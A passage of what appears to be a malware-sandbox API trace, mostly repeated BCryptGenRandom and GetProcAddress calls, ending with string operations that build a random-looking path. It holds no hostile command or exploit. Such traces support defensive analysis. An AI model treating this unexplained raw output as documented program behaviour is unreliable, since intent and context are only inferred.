hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0179.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0179.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.570] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.571] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.571] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.571] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.572] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.572] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.572] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.572] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0179.572] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.572] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1682e, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a1682e) returned 0x0 [0179.573] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.573] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.573] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0179.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16843, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x3a16843) returned 0x0 [0179.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.583] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.583] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.589] GetProcessHeap () returned 0x440000 [0179.589] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4741c0 [0179.589] lstrcpyA (in: lpString1=0x4741c0, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0179.589] lstrcatA (in: lpString1="\x81\x03", lpString2="/anP0to3WoP280Bjucuuisc6cHvySo0OW639p6cvm5n0u/YfpgrVbmfaqa9wponLoe/oOmr6tkzhpz2Pzoal404basfH4vkqafdg8nuun9ka0zfa3ys/" | out: lpString1="\x81\x03/anP0to3WoP280Bjucuuisc6cHvySo0OW639p6cvm5n0u/YfpgrVbmfaqa9wponLoe/oOmr6tkzhpz2Pzoal404basfH4vkqafdg8nuun9ka0zfa3ys/") 